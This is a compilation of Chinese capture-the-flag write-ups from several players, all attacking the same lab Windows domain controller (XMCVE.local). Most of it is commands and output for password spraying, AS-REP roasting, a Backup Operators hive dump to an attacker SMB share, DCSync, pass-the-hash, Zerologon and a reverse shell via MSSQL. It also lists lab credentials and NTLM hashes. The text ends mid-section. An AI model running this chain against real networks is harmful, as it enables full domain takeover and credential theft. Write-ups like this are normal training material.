Wh1teSu（域用户-弱口令）

结论

这题的核心利用链是：

通过 Kerberos 用户枚举拿到一批有效用户名
用弱口令喷洒拿到低权限域用户
用 BloodHound 数据确认 mowen 开启 Do not require Kerberos preauthentication，且属于 Backup Operators
对 mowen 做 AS-REP Roast，爆破出密码 1maxwell
结合 GitHub MCP 查到的 backup_dc_registry 思路，利用 reg.py backup 让域控把 SAM/SYSTEM/SECURITY 直接备份到 Kali 的 SMB 共享
从离线 hive 提取出域控机器账户 CASTLEVANIA$ 的 NTLM
使用机器账户做 DCSync，拿到 Administrator 哈希
PTH 到目标主机，成功获得 Administrator shell

题目要求是“拿到 Administrator 的 shell 即可”，到第 8 步已经满足。

目标信息

已知开放端口如下：

53, 80, 88, 135, 139, 389, 445, 464, 593, 636, 1433, 3268, 3269, 9389

进一步探测：

1
nmap -sV -sC -p53,80,88,135,139,389,445,464,593,636,1433,3268,3269,9389 192.168.56.105

关键结果：

Host: CASTLEVANIA.XMCVE.local
Domain: XMCVE.local
80/tcp: IIS 10
1433/tcp: Microsoft SQL Server 2016

HTTP 首页只有一个维护页面：

CASTLEVANIA Portal
Employee Portal
Under maintenance…

说明真正入口大概率不在 Web，而是在 AD 身份面。

1. 用户枚举与口令喷洒

先用 kerbrute 跑一轮常见用户名：

1
kerbrute userenum -d XMCVE.local --dc 192.168.56.105 /usr/share/seclists/Usernames/top-usernames-shortlist.txt

命中的有效用户包括：

1
admin
2
sales
3
support
4
administrator
5
Admin
6
alucard

接着做一轮最常见弱口令喷洒：

1
kerbrute passwordspray -d XMCVE.local --dc 192.168.56.105 valid_users.txt 'Password123!'

命中结果：

1
admin:Password123!
2
sales:Password123!
3
support:Password123!
4
Admin:Password123!

这一步只拿到了普通域账号，没有直接管理权限。

2. BloodHound 找真正突破口

用已知凭据采集 BloodHound 数据：

1
bloodhound-python -u admin -p 'Password123!' -d XMCVE.local -dc CASTLEVANIA.XMCVE.local -ns 192.168.56.105 -c All --zip

在采集结果里，关键用户是 MOWEN@XMCVE.LOCAL。

已验证到的关键属性：

1
dontreqpreauth: true
2
serviceprincipalnames: HTTP/CASTLEVANIA.XMCVE.local
3
member of: BACKUP OPERATORS

同时还能看到：

ALUCARD@XMCVE.LOCAL -> member of local Administrators

但 alucard 当前没有口令，暂时走不通。

因此最优路径变成：

先打 mowen 的 AS-REP Roast
再利用其 Backup Operators 权限打域控

3. AS-REP Roast 拿下 mowen

因为 mowen 开启了“不需要预认证”，可以直接请求 AS-REP：

impacket-GetNPUsers XMCVE.local/mowen -dc-ip 192.168.56.105 -no-pass -request

拿到哈希后用 John 爆破：

1
john mowen.asrep --wordlist=/usr/share/wordlists/rockyou.txt
2
john --show mowen.asrep

爆破结果：

mowen:1maxwell

至此得到可用凭据：

XMCVE.local\mowen : 1maxwell

4. 用 mowen 做资产验证

先看 SMB 权限：

nxc smb 192.168.56.105 -u mowen -p ‘1maxwell’ -d XMCVE.local —shares

已验证结果：

1
ADMIN$    READ
2
C$        READ,WRITE
3
IPC$      READ
4
NETLOGON  READ
5
SYSVOL    READ

但常规远程执行并不通：

1
atexec.py ...
2
wmiexec.py ...
3
psexec.py ...

结果分别遇到：

1
rpc_s_access_denied
2
ADMIN$/C$ not writable enough for service drop

说明 mowen 的价值不是直接执行，而是其 Backup Operators 身份。

顺手还从站点目录里发现了一个低价值 SQL 凭据：

1
C:\inetpub\wwwroot\poo_connection.txt
2
server=localhost;
3
user=wuwupor;
4
password=lovlyBaby
5
database=master

验证后发现 wuwupor 只是低权限 SQL 登录：

1
SYSTEM_USER = wuwupor
2
IS_SRVROLEMEMBER('sysadmin') = 0
3
xp_cmdshell denied

因此 MSSQL 这条线是干扰项，不是正解。

5. GitHub MCP 确认 Backup Operators 利用法

这里我没有凭记忆硬打，而是用 GitHub MCP 查公开实现。

检索后定位到：

horizon3ai/backup_dc_registry

仓库 README 明确说明：

abuses Backup Operator privileges to remote dump SAM, SYSTEM, and SECURITY hives

其核心用法是：

python3 reg.py user:pass@dc backup -p ‘\attacker\share’

再对照本机 reg.py -h，确认当前环境中的 Impacket 已内置 backup 动作，且参数形式为：

reg.py ‘domain/user:pass@target’ backup -o ‘\attacker\share’

这一步非常关键，因为之前如果把输出写成本地目录，命令会失败；正确思路是让目标机把 hive 备份到攻击机暴露的 UNC 路径。

6. 让域控反向备份注册表 hive 到 Kali

先在 Kali 上起一个 SMB 接收共享：

1
mkdir -p /tmp/regshare
2
smbserver.py -smb2support -ip 192.168.56.101 share /tmp/regshare

我的 Kali 在目标网段的地址是：

192.168.56.101

然后直接执行备份：

reg.py ‘XMCVE.local/mowen:1maxwell@192.168.56.105’ -dc-ip 192.168.56.105 backup -o ‘\192.168.56.101\share’

已验证输出：

1
[!] Cannot check RemoteRegistry status. Triggering start trough named pipe...
2
[*] Saved HKLM\SAM to \\192.168.56.101\share\SAM.save
3
[*] Saved HKLM\SYSTEM to \\192.168.56.101\share\SYSTEM.save
4
[*] Saved HKLM\SECURITY to \\192.168.56.101\share\SECURITY.save

共享目录落地成功：

1
/tmp/regshare/SAM.save
2
/tmp/regshare/SYSTEM.save
3
/tmp/regshare/SECURITY.save

7. 离线提取机器账户哈希

对回传的 hive 做离线 secretsdump：

secretsdump.py -sam /tmp/regshare/SAM.save -system /tmp/regshare/SYSTEM.save -security /tmp/regshare/SECURITY.save LOCAL

关键结果有两个：

本地 SAM 里的 Administrator 哈希
更重要的域控机器账户 $MACHINE.ACC

提取结果中的核心值：

$MACHINE.ACC: aad3b435b51404eeaad3b435b51404ee:7ca8289eae8ab9490db2bfee75bc0d78

因为目标本身是域控，机器账户 CASTLEVANIA$ 属于 Domain Controllers，天然具备目录复制能力，所以这一步足够直接推进到 DCSync。

先验证机器账户哈希可用：

1
nxc smb 192.168.56.105 -u 'CASTLEVANIA$' -H '7ca8289eae8ab9490db2bfee75bc0d78' -d XMCVE.local

结果：

[+] XMCVE.local\CASTLEVANIA$:7ca8289eae8ab9490db2bfee75bc0d78

8. 用机器账户做 DCSync 拿 Administrator

接着直接用机器账户哈希做 DCSync：

1
secretsdump.py -just-dc-user Administrator -hashes ':7ca8289eae8ab9490db2bfee75bc0d78' 'XMCVE.local/CASTLEVANIA$@192.168.56.105' -dc-ip 192.168.56.105

成功回显：

1
[*] Using the DRSUAPI method to get NTDS.DIT secrets
2
Administrator:500:aad3b435b51404eeaad3b435b51404ee:d94f9831271e229dbc6e712097b63168:::

至此得到：

XMCVE.local\Administrator NTLM = d94f9831271e229dbc6e712097b63168

9. PTH 获取 Administrator shell

最后直接 PTH：

1
wmiexec.py -hashes ':d94f9831271e229dbc6e712097b63168' 'XMCVE.local/Administrator@192.168.56.105' 'whoami /all'

已验证输出中的关键部分：

1
User Name
2
xmcve\administrator

以及高权限组：

1
XMCVE\Domain Admins
2
XMCVE\Enterprise Admins
3
XMCVE\Schema Admins
4
BUILTIN\Administrators

这说明已经稳定取得 Administrator shell，题目完成。

最终利用链复盘

这题的设计点其实很明确：

弱口令只是入口，不是终点
真正核心是 BloodHound 给出的 mowen -> Backup Operators + no preauth
Backup Operators 在域控上非常危险，因为它能把注册表 hive 备份出来
一旦拿到域控机器账户 hash，就能直接 DCSync
DCSync 之后再 PTH 到 Administrator，整条链就闭环了

最短路径可以概括成一句话：

弱口令域用户 -> BloodHound 定位 mowen -> AS-REP Roast -> Backup Operators 远程导出 hive -> 机器账户 hash -> DCSync -> PTH Administrator

关键命令汇总

1
# 用户枚举
2
kerbrute userenum -d XMCVE.local --dc 192.168.56.105 users.txt
3

4
# 弱口令喷洒
5
kerbrute passwordspray -d XMCVE.local --dc 192.168.56.105 valid_users.txt 'Password123!'
6

7
# BloodHound 采集
8
bloodhound-python -u admin -p 'Password123!' -d XMCVE.local -dc CASTLEVANIA.XMCVE.local -ns 192.168.56.105 -c All --zip
9

10
# AS-REP Roast
11
impacket-GetNPUsers XMCVE.local/mowen -dc-ip 192.168.56.105 -no-pass -request
12
john mowen.asrep --wordlist=/usr/share/wordlists/rockyou.txt
13

14
# 起 SMB 接收共享
15
smbserver.py -smb2support -ip 192.168.56.101 share /tmp/regshare
16

17
# 远程导出 hive
18
reg.py 'XMCVE.local/mowen:1maxwell@192.168.56.105' -dc-ip 192.168.56.105 backup -o '\\192.168.56.101\share'
19

20
# 离线提取
21
secretsdump.py -sam /tmp/regshare/SAM.save -system /tmp/regshare/SYSTEM.save -security /tmp/regshare/SECURITY.save LOCAL
22

23
# 机器账户 DCSync
24
secretsdump.py -just-dc-user Administrator -hashes ':7ca8289eae8ab9490db2bfee75bc0d78' 'XMCVE.local/CASTLEVANIA$@192.168.56.105' -dc-ip 192.168.56.105
25

26
# PTH 验证 Administrator shell
27
wmiexec.py -hashes ':d94f9831271e229dbc6e712097b63168' 'XMCVE.local/Administrator@192.168.56.105' 'whoami /all'

Lkin（本地挂载）

解题思路

通过离线挂载域控硬盘提取 AD 凭据，再利用 Pass-the-Hash 攻击直接以管理员身份登录靶机，最终获得 nt authority\system 权限。

解题过程

1. 挂载硬盘并提取 NTDS 数据库

将 Windows 域控的虚拟硬盘挂载到 Kali Linux，复制 AD 数据库文件：

ntds.dit：Active Directory 数据库，存储所有域用户的凭据 Hash

SYSTEM：注册表 Hive，包含解密 ntds.dit 所需的 BootKey

1
sudo cp /mnt/win/Windows/NTDS/ntds.dit ~/Desktop/
2
sudo cp /mnt/win/Windows/System32/config/SYSTEM ~/Desktop/

2. 离线提取域用户 Hash

使用 impacket-secretsdump 离线解密 ntds.dit：

关键发现：Administrator 与 Alucard 共享同一个 NT Hash，多个普通用户也共享同一个 Hash，说明存在弱密码策略。

1
sudo impacket-secretsdump -ntds ~/Desktop/ntds.dit -system ~/Desktop/SYSTEM LOCAL

成功提取所有域用户的 NT Hash： Administrator:500:aad3b435b51404eeaad3b435b51404ee:d94f9831271e229dbc6e712097b63168::: Alucard:1000:aad3b435b51404eeaad3b435b51404ee:d94f9831271e229dbc6e712097b63168::: XMCVE.local\p2zhh:1104:::bc2bf43119e258bcecf71d44abc29db7::: XMCVE.local\mowen:1105:::efb5fa49a38497a71e144f690860688e::: XMCVE.local\sales/support/it/hr/admin:共享 hash 2b576acbe6bcfda7294d6bd18041b8fe XMCVE.local\sqlsvc:1112:::d93ef04edb808c5bce3a5bd67b936ca9:::

3. 确定靶机 IP

将硬盘放回靶机，两台 VM 网络均改为桥接模式，启动后在 Kali 中扫描：

发现靶机 IP：192.168.81.124（MAC: 08:00:27:65:5F:89，VirtualBox NIC）

nmap -sn 192.168.81.0/24

4. Pass-the-Hash 攻击

WinRM 端口（5985/5986）被防火墙过滤，改用 impacket-psexec 进行 Pass-the-Hash：

Pass-the-Hash 原理：Windows NTLM 认证使用 NT Hash 直接计算响应值，无需明文密码即可通过认证。

1
impacket-psexec Administrator@192.168.81.124 \
2
  -hashes aad3b435b51404eeaad3b435b51404ee:d94f9831271e229dbc6e712097b63168

成功获得 Shell：

5. 权限确认

1
whoami

攻击链

1
挂载硬盘 → 提取 NTDS → 获取 NT Hash → Pass-the-Hash → SYSTEM 权限

最终权限

域控完全沦陷

本地

nt authority\system

域内

Domain Admins + Enterprise Admins + Schema Admins

NikoCat（Zerologon）

端口扫描

1
[731ms]     已选择服务扫描模式
2
[731ms]     开始信息扫描
3
[731ms]     最终有效主机数量: 1
4
[731ms]     开始主机扫描
5
[731ms]     使用服务插件: activemq, cassandra, elasticsearch, findnet, ftp, imap, kafka, ldap, memcached, modbus, mongodb, ms17010, mssql, mysql, neo4j, netbios, oracle, pop3, postgres, rabbitmq, rdp, redis, rsync, smb, smb2, smbghost, smtp, snmp, ssh, telnet, vnc, webpoc, webtitle
6
[737ms]     有效端口数量: 65535
7
[748ms] [*] 端口开放 192.168.56.101:389
8
[753ms] [*] 端口开放 192.168.56.101:139
9
[754ms] [*] 端口开放 192.168.56.101:593
10
[755ms] [*] 端口开放 192.168.56.101:80
11
[755ms] [*] 端口开放 192.168.56.101:445
12
[755ms] [*] 端口开放 192.168.56.101:88
13
[755ms] [*] 端口开放 192.168.56.101:53
14
[755ms] [*] 端口开放 192.168.56.101:135
15
[755ms] [*] 端口开放 192.168.56.101:464
16
[3.7s] [*] 端口开放 192.168.56.101:636
17
[6.8s] [*] 端口开放 192.168.56.101:1433
18
[15.8s] [*] 端口开放 192.168.56.101:3268
19
[15.8s] [*] 端口开放 192.168.56.101:3269
20
[45.8s] [*] 端口开放 192.168.56.101:9389
21
[4m6s] [*] 端口开放 192.168.56.101:49668
22
[4m6s] [*] 端口开放 192.168.56.101:49671
23
[4m6s] [*] 端口开放 192.168.56.101:49690
24
[4m6s] [*] 端口开放 192.168.56.101:49670
25
[5m6s] [*] 端口开放 192.168.56.101:61436
26
[5m30s]     扫描完成, 发现 19 个开放端口
27
[5m30s]     存活端口数量: 19
28
[5m30s]     开始漏洞扫描
29
[5m30s] [*] 网站标题 http://192.168.56.101     状态码:200 长度:157    标题:CASTLEVANIA Portal
30
[5m30s] [*] NetInfo 扫描结果
31
目标主机: 192.168.56.101
32
主机名: CASTLEVANIA
33
发现的网络接口:
34
   IPv4地址:
35
      └─ 192.168.56.101
36
[5m30s] [+] NetBios 192.168.56.101  DC:XMCVE\CASTLEVANIA
37
[5m30s]     POC加载完成: 总共387个，成功387个，失败0个
38
[5m31s]     扫描已完成: 13/13

没洞啊？只能从IIS突破一下

dirsearch没结果

IIS

搜索半天发现神秘工具 iis_shortname_scan.py

房主有神器

1
Server is vulnerable, please wait, scanning...
2
[+] /i~1.*      [scan in progress]
3
[+] /p~1.*      [scan in progress]
4
[+] /in~1.*     [scan in progress]
5
[+] /po~1.*     [scan in progress]
6
[+] /ind~1.*    [scan in progress]
7
[+] /poo~1.*    [scan in progress]
8
[+] /inde~1.*   [scan in progress]
9
[+] /poo_~1.*   [scan in progress]
10
[+] /index~1.*  [scan in progress]
11
[+] /poo_c~1.*  [scan in progress]
12
[+] /poo_co~1.* [scan in progress]
13
[+] /poo_co~1.t*        [scan in progress]
14
[+] /poo_co~1.tx*       [scan in progress]
15
[+] /poo_co~1.txt*      [scan in progress]
16
[+] File /poo_co~1.txt* [Done]
17

18
0 Directories, 1 Files found in total
19
Note that * is a wildcard, matches any character zero or more times.

也就是说有个叫/poo_co~1.txt*的东西，但是我们不知道具体的文件名无法下载

直接上bing搜索，发现神秘复现文章 https://snowscan.io/htb-writeup-poo/#↗

虽然我没有fuzz，但是我有搜索引擎，所以我获得了神秘的poo_connection.txt

1
server=localhost;
2
user=wuwupor;
3
password=lovlyBaby
4
database=master

MSSQL

入侵神秘数据库，用户本身只是普通public权限，但是发现存在linked server数据库

看一下在poo_public的权限

在POO_PUBLIC上用户被映射为sa

试试命令执行

可以直接命令执行，手动编译一个vshell，注意这里只能反连（因为有域防火墙）。vshell默认的脚本放的public文件夹，数据库用户访问不了。

域内用户

上线以后看一下域内用户

这个mowen用户和p2zhh用户有点说法，拿出来进行一个smb爆破

挂了快一个小时，爆出来了。当然这里可以直接上msf马，当时糖了

由于没开远程桌面，直接登录

Msfconsole

上一个msf马，依旧反连，而且莫名其妙地只能打上x32的马，x64的马就是出不来

use post/multi/recon/local_exploit_suggester

扫出来一坨

Zerologon

使用cve_2020_0787的exp

由于靶机患了抑郁症，x64的反连shell一直打不出来，只能直接传exp上去了

这里使用 https://github.com/cbwang505/CVE-2020-0787-EXP-ALL-WINDOWS-VERSION↗ 即可一把梭

此处获得了system shell，相当于已经有管理员权限

onehang （Zerologon）

信息收集

端口扫描

先ipconfig看一下启动的靶机的地址，得到host-only的网卡IP是192.168.56.1，说明靶机在192.168.56.0/24网段 nmap扫一下

1
┌──(root㉿LAPTOP-UTBE3HPF)-[/mnt/c/Users/onehang]
2
└─# nmap -sn 192.168.56.0/24
3
Starting Nmap 7.95 ( https://nmap.org ) at 2026-03-2820:35 CST
4
Nmap scan report for[1].168.56.1 Host is up (0.00044s latency).
5
Nmap scan report for192.168.56.100 Host is up (0.00063s latency).
6
Nmap scan report for192.168.56.103 Host is up (0.0015s latency).
7
Nmap done: 256 IP addresses (3 hosts up) scanned in16.51 seconds

发现了两个目标：

SMB签名：已启用且强制
有两个重要的攻击面：Web 网站和 MSSQL。

1
┌──(root㉿LAPTOP-UTBE3HPF)-[/mnt/c/Users/onehang]
2
└─# nmap -sV -sC -p- --min-rate 5000 192.168.56.103
3
Starting Nmap 7.95 ( https://nmap.org ) at 2026-03-2820:36 CST
4
Nmap scan report for[2].168.56.103 Host is up (0.00062s latency).
5
Not shown: 65516 filtered tcp ports (no-response)
6
PORT      STATE SERVICE       VERSION
7
53/tcp    open  domain        Simple DNS Plus
8
80/tcp    open  http          Microsoft IIS httpd 10.0 |_http-server-header: Microsoft-IIS/10.0 | http-methods:
9
|_  Potentially risky methods: TRACE
10
|_http-title: CASTLEVANIA Portal
11
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2026-03-2812:37:10Z)
12
135/tcp   open  msrpc         Microsoft Windows RPC
13
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
14
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: XMCVE.local, Site: Default-
15
First-Site-Name)
16
445/tcp   open  microsoft-ds?
17
464/tcp   open  kpasswd5?
18
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
19
636/tcp   open  tcpwrapped
20
1433/tcp  open  ms-sql-s      Microsoft SQL Server 201613.00.5026.00; SP2
21
|_ssl-date: 2026-03-28T12:38:38+00:00; 0s from scanner time.
22
| ms-sql-ntlm-info:
23
|   192.168.56.103:1433: |     Target_Name: XMCVE
24
|     NetBIOS_Domain_Name: XMCVE
25
|     NetBIOS_Computer_Name: CASTLEVANIA
26
|     DNS_Domain_Name: XMCVE.local
27
|     DNS_Computer_Name: CASTLEVANIA.XMCVE.local
28
|     DNS_Tree_Name: XMCVE.local
29
|_    Product_Version: 10.0.17763
30
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
31
| Not valid before: 2026-03-28T12:32:49
32
|_Not valid after:  2056-03-28T12:32:49 | ms-sql-info:
33
|   192.168.56.103:1433:
34
|     Version:
35
|       name: Microsoft SQL Server 2016 SP2
36
|       number: 13.00.5026.00
37
|       Product: Microsoft SQL Server 2016
38
|       Service pack level: SP2
39
|       Post-SP patches applied: false
40
|_    TCP port: 1433
41
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: XMCVE.local, Site: Default-
42
First-Site-Name)
43
3269/tcp  open  tcpwrapped
44
9389/tcp  open  mc-nmf        .NET Message Framing
45
49666/tcp open  msrpc         Microsoft Windows RPC
46
49667/tcp open  msrpc         Microsoft Windows RPC
47
49669/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
48
49670/tcp open  msrpc         Microsoft Windows RPC
49
49689/tcp open  msrpc         Microsoft Windows RPC
50
Service Info: Host: CASTLEVANIA; OS: Windows; CPE: cpe:/o:microsoft:windows
51
Host script results:
52
| smb2-time:
53
|   date: 2026-03-28T12:37:58
54
|_  start_date: N/A | smb2-security-mode:
55
|   3:1:1:
56
|_    Message signing enabled and required
57
|_nbstat: NetBIOS name: CASTLEVANIA, NetBIOS user: <unknown>, NetBIOS MAC: 08:00:27:7d:4a:d4 (PCS
58
Systemtechnik/Oracle VirtualBox virtual NIC)
59
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
60
Nmap done: 1 IP address (1 host up) scanned in120.46 seconds

主机名	CASTLEVANIA
域名	XMCVE.local
FQDN	CASTLEVANIA.XMCVE.local
操作系统	Windows Server 2019
关键服务	IIS 网站(80), MSSQL 2016(1433), AD域控(88/389/445)

添加 hosts 并查看网站

没有什么信息

1
┌──(root㉿LAPTOP-UTBE3HPF)-[/mnt/c/Users/onehang]
2
└─# echo "192.168.56.103 CASTLEVANIA CASTLEVANIA.XMCVE.local XMCVE.local" >> /etc/hosts
3
┌──(root㉿LAPTOP-UTBE3HPF)-[/mnt/c/Users/onehang]
4
└─# curl http://192.168.56.103 •<!DOCTYPE html>
5
<html>
6
<head><title>CASTLEVANIA Portal</title></head>
7
<body>
8
<h1>Employee Portal</h1>
9
<p>Under maintenance...</p>
10
</body>
11
</html>

枚举

SMB匿名枚举

1
┌──(root㉿LAPTOP-UTBE3HPF)-[/mnt/c/Users/onehang]
2
└─# smbclient -L //192.168.56.103 -N session setup failed: NT_STATUS_ACCESS_DENIED

LDAP匿名枚举

1
┌──(root㉿LAPTOP-UTBE3HPF)-[/mnt/c/Users/onehang]
2
└─# ldapsearch -x -H ldap://192.168.56.103 -b "DC=XMCVE,DC=local" -s base # extended LDIF
3

4
#
5
# LDAPv3
6
# base <DC=XMCVE,DC=local> with scope baseObject
7
# filter: (objectclass=*)
8
# requesting: ALL
9
#
10
# search result search: 2 result: 1 Operations error text: 000004DC: LdapErr: DSID-0C090A37, comment: In order to perform this opera  tion a successful bind must be completed on the connection., data 0, v4563 # numResponses:

Web 目录爆破

1
┌──(root㉿LAPTOP-UTBE3HPF)-[/mnt/c/Users/onehang]
2
└─# dirsearch -u http://192.168.56.103
3
/usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html   from pkg_resources import DistributionNotFound, VersionConflict
4
_|. _ _  _  _  _ _|_    v0.4.3
5
(_||| _) (/_(_|| (_| )
6
Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11460
7
Output File: /mnt/c/Users/onehang/reports/http_192.168.56.103/_26-03-28_20-50-40.txt Target: http://192.168.56.103/
8
[20:50:40] Starting:
9
[20:50:40] 403-  312B  - /%2e%2e//google.com
10
[20:50:40] 403-  312B  - /.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd
11
[20:50:42] 403-  312B  - /\..\..\..\..\..\..\..\..\..\etc\passwd
12
[20:50:47] 403-  312B  - /cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd

枚举域用户

1
┌──(root㉿LAPTOP-UTBE3HPF)-[/mnt/c/Users/onehang]
2
└─# crackmapexec smb 192.168.56.103 -u '' -p '' --rid-brute
3
[*] First time use detected
4
[*] Creating home directory structure
5
[*] Creating default workspace
6
[*] Initializing FTP protocol database
7
[*] Initializing WINRM protocol database
8
[*] Initializing LDAP protocol database
9
[*] Initializing RDP protocol database
10
[*] Initializing SMB protocol database
11
[*] Initializing MSSQL protocol database
12
[*] Initializing SSH protocol database
13
[*] Copying default configuration file
14
[*] Generating SSL certificate
15
SMB         192.168.56.103  445    CASTLEVANIA      [*] Windows 10 / Server 2019 Build 17763 x64
16
(name:CASTLEVANIA) (domain:XMCVE.local) (signing:True) (SMBv1:False)
17
SMB         192.168.56.103  445    CASTLEVANIA      [-] XMCVE.local\: STATUS_ACCESS_DENIED
18
SMB         192.168.56.103  445    CASTLEVANIA      [-] Error creating DCERPC connection: SMB SessionError: code: 0xc0000022 - STATUS_ACCESS_DENIED - {Access Denied} A process has requested access to an object but has not been granted those access rights.

mssql 弱口令

1
┌──(root㉿LAPTOP-UTBE3HPF)-[/mnt/c/Users/onehang]
2
└─# crackmapexec mssql 192.168.56.103 -u 'sa' -p 'password' --local-auth
3
MSSQL       192.168.56.103  1433   CASTLEVANIA      [*] Windows 10 / Server 2019 Build 17763
4
(name:CASTLEVANIA) (domain:CASTLEVANIA)
5
MSSQL       192.168.56.103  1433   CASTLEVANIA      [-] ERROR(CASTLEVANIA): Line 1: Login failed for user
6
'sa'.

枚举Kerberos用户

找到 3 个有效用户，尝试 AS-REP Roasting（检查是否有用户不需要 Kerberos 预认证）

1
┌──(root㉿LAPTOP-UTBE3HPF)-[/mnt/c/Users/onehang]
2
└─# nmap -p 88 --script krb5-enum-users --script-args krb5-enumusers.realm='XMCVE.local',userdb=/tmp/users.txt 192.168.56.103
3
Starting Nmap 7.95 ( https://nmap.org ) at 2026-03-2820:52 CST
4
Nmap scan report for CASTLEVANIA (192.168.56.103) Host is up (0.00056s latency).
5
PORT   STATE SERVICE
6
88/tcp open  kerberos-sec | krb5-enum-users:
7
| Discovered Kerberos principals
8
|     admin@XMCVE.local
9
|     administrator@XMCVE.local
10
|_    alucard@XMCVE.local
11
Nmap done: 1 IP address (1 host up) scanned in0.18 seconds

AS-REP Roasting

1
┌──(root㉿LAPTOP-UTBE3HPF)-[/mnt/c/Users/onehang]
2
└─# impacket-GetNPUsers XMCVE.local/ -usersfile /tmp/users.txt -dc-ip 192.168.56.103 -no-pass
3
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
4
[-] User administrator doesn't have UF_DONT_REQUIRE_PREAUTH set
5
[-] User admin doesn't have UF_DONT_REQUIRE_PREAUTH set
6
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
7
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
8
[-] User alucard doesn't have UF_DONT_REQUIRE_PREAUTH set
9
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
10
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
11
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
12
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
13
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
14
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
15
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
16
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
17
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)

都防护的挺死的没什么可以打的点，目前打的渗透不多但是基本上每次都要打cve，并且感觉windows server 2019可能有cve，搜索一下

发现windows server 2019在CVE-2020-1472的影响版本中，尝试利用

Zerologon

hash dump

利用成功，接下来dump域内所有用户的哈希

用户	NTLM 哈希
Administrator	d94f9831271e229dbc6e712097b63168
Alucard	d94f9831271e229dbc6e712097b63168
krbtgt	1e3c4fe72e1383c576b4b3aeef4730a8
sqlsvc	d93ef04edb808c5bce3a5bd67b936ca9

psexec

使用Administrator 的哈希登录-system

wmiexec

wmiexec连接才是administrator

Skywalker_Han（Zerologon）

kerbrute

1
$ kerbrute userenum --dc $ip -d XMCVE.local /home/hank/tools/dic/us
2
__             __               __        / /_____  _____/ /_  _______  __/ /____   / //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \  / ,< /  __/ /  / /_/ / /  / /_/ / /_/  __/
3
/_/|_|\___/_/  /_.___/_/   \__,_/\__/\___/
4
Version: v1.0.3 (9dad6e1) - 03/28/26 - Ronnie Flathers @rop nop
5
2026/03/28 09:51:01 >  Using KDC(s):
6
2026/03/28 09:51:01 >  10.200.26.154:88
7
2026/03/28 09:51:01 >  [+] VALID USERNAME: admin@XMCVE.local
8
2026/03/28 09:51:01 >  [+] VALID USERNAME: sales@XMCVE.local
9
2026/03/28 09:51:02 >  [+] VALID USERNAME: support@XMCVE. local
10
2026/03/28 09:51:10 >  [+] VALID USERNAME: administrator@XMCVE.local
11
2026/03/28 09:51:10 >  [+] VALID USERNAME: Admin@XMCVE.lo cal
12
2026/03/28 09:51:24 >  [+] VALID USERNAME: alucard@XMCVE.local
13
2026/03/28 09:52:09 >  [+] VALID USERNAME: Alucard@XMCVE. local
14
2026/03/28 09:52:14 >  [+] VALID USERNAME: Administrator@XMCVE.loca

端口扫描

1
$ fscan -h 10.200.26.154
2
┌──────────────────────────────────────────────┐
3
│    ___                              _        │
4
│   / _ \     ___  ___ _ __ __ _  ___| | __    │
5
│  / /_\/____/ __|/ __| '__/ _` |/ __| |/ /    │
6
│ / /_\\_____\__ \ (__| | | (_| | (__|   <     │
7
│ \____/     |___/\___|_|  \__,_|\___|_|\_\    │
8
└──────────────────────────────────────────────┘
9
Fscan Version: 2.0.0
10
[2026-03-28 09:45:58] [INFO] 暴⼒破解线程数: 1
11
[2026-03-28 09:45:58] [INFO] 开始信息扫描
12
[2026-03-28 09:45:58] [INFO] 最终有效主机数量: 1
13
[2026-03-28 09:45:58] [INFO] 开始主机扫描
14
[2026-03-28 09:45:58] [INFO] 有效端⼝数量: 233
15
[2026-03-28 09:45:59] [SUCCESS] 端⼝开放 10.200.26.154:139
16
[2026-03-28 09:45:59] [SUCCESS] 端⼝开放 10.200.26.154:88
17
[2026-03-28 09:45:59] [SUCCESS] 端⼝开放 10.200.26.154:1433
18
[2026-03-28 09:45:59] [SUCCESS] 端⼝开放 10.200.26.154:80
19
[2026-03-28 09:45:59] [SUCCESS] 端⼝开放 10.200.26.154:389
20
[2026-03-28 09:45:59] [SUCCESS] 端⼝开放 10.200.26.154:445
21
[2026-03-28 09:45:59] [SUCCESS] 端⼝开放 10.200.26.154:135
22
[2026-03-28 09:46:04] [SUCCESS] 服务识别 10.200.26.154:139 =>Banner:[.]
23
[2026-03-28 09:46:04] [SUCCESS] 服务识别 10.200.26.154:88 =>
24
[2026-03-28 09:46:04] [SUCCESS] 服务识别 10.200.26.154:1433 => [ms-sql-s] 版]
25
[2026-03-28 09:46:04] [SUCCESS] 服务识别 10.200.26.154:80 => [http]
26
[2026-03-28 09:46:04] [SUCCESS] 服务识别 10.200.26.154:389 =
27
[2026-03-28 09:46:04] [SUCCESS] 服务识别 10.200.26.154:445 =

timeroast-时钟烘焙

1
└─$ python timeroast.py $ip
2
